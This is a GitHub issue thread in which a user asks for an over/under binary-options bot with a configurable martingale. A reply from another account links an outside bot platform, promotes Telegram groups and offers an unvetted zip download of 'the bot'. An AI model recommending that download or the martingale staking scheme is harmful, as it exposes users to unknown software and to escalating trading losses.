### ISSUE TITLE
Over under Bot

### ISSUE THREAD

**Issue by Ncubed254** [binary-com/binary-bot#3920]
Hello.. kindly build me a bot trading over 4 under 5  with the following instructions
 Purchase over 4 two times then shift to under 5 two times then over 4 and so on 
I want it to have a feature where I can decide when it should apply the martingale for instance if I set it at 2 , it should apply the martingale after the second loss. 
Over 
Over
Under
Under
Over
Over
Under
Under 
Thank You

**Comment by Andres-Guarin** [comment]
open the bot here👇
https://bot.binarytools.io/platform

Virtual Hook library [DISABLED] added ✅

![image](https://github.com/binary-com/binary-bot/assets/131272671/c3af5d07-73fd-455f-9a4b-7c3e9464eb9c)
![image](https://github.com/binary-com/binary-bot/assets/131272671/113cea87-d735-49ac-98b7-0b9abb446b4e)
![image](https://github.com/binary-com/binary-bot/assets/131272671/d8928113-47c8-4c38-8d33-4c56408d5481)
![image](https://github.com/binary-com/binary-bot/assets/131272671/5dd9490a-cc12-447d-8811-d8bdd05c461c)
![image](https://github.com/binary-com/binary-bot/assets/131272671/e14a0a9b-2dd3-4cdd-8099-b91356c89e98)
![image](https://github.com/binary-com/binary-bot/assets/131272671/c7dfd1f2-e090-492e-9cdf-e6bb775d7503)

We remind you that Neuronal Trader only has 3 groups:

✅ (SPANISH GROUP)
https://t.me/neuronaltrader_community
✅ (ENGLISH GROUP)
https://t.me/neuronaltrader_community
✅ (PORTUGUESE GROUP)
https://t.me/neuronaltrader_portugues

and there is only one channel for informational purposes:

👉(THE ONLY NEURONAL TRADER CHANNEL)👈
https://t.me/neuronaltrader

🔉🔊❕These are the official Neuronal Trader communities❕📢📣

👇👇DOWNLOAD THE BOT FREE HERE 👇👇
[OVER UNDER PATTERN LIST.zip](https://github.com/binary-com/binary-bot/files/12339098/OVER.UNDER.PATTERN.LIST.zip)

**Comment by Ncubed254** [comment]
Thank You. Andres
